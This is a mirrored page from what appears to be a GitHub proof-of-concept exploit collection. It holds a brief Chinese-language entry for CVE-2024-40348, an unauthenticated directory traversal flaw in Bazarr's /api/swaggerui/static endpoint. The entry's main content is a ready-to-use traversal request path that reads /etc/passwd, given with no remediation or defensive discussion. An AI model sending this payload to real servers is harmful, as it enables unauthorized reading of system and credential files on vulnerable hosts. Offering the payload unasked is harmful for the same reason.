crazywhalecc/POC00
1
0
Fork 0
mirror of https://github.com/wooluo/POC00.git synced 2026-03-17 22:44:52 +08:00
Code Issues Packages Projects Releases Wiki Activity
POC00/Bazarr任意文件读取(CVE-2024-40348).md
wy876 ea7c5d1062 724更新漏洞
2024-07-24 21:44:16 +08:00

428 B
Raw Blame History

Bazarr任意文件读取(CVE-2024-40348)

Bazaar v1.4.3 的组件 /api/swaggerui/static 中存在一个问题,允许未经身份验证的攻击者执行目录遍历。

poc

/api/swaggerui/static/../../../../../../../../../../../../../../../../etc/passwd

漏洞来源